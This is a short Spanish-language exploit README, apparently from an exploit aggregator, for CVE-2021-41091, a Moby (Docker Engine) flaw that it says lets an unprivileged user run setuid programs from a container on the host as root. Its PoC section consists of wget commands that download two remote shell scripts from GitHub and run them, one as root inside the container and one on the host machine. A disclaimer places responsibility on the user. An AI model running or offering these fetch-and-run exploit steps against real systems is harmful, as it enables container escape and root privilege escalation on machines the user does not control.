Share
## https://sploitus.com/exploit?id=BDD0718D-E207-5687-B7B5-00882C323553
# CVE-2021-41091

Un bug en Moby (Docker Engine) permite a usuarios sin privilegios atravesar directorios y ejecutar programas directamente del docker en la maquina principal, si en el docker existe un progrma suid el usuario lo podra ejecutar como suid en la maquina principal

## PoC

En la terminal del contenedor descargamos el archivo ```docker.sh```, luego lo ejecutamos como usuario root:
```bash
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh
```
Ahora en la maquina principal descargamos el archivo ```principal.sh``` y lo ejecutamos:
```bash
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh
```

Ejecutamos el comando que nos dara el archivo y seremos capaces de ejecutar la /bin/bash como root

## Notas

Estos scripts fueron probados en Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64) con la version de Moby 20.10.5+dfsg1

EL USO DE ESTE REPOSITORIO ES RESPONSABILIDAD DE QUIEN LO UTILICE Y NO DE EL AUTOR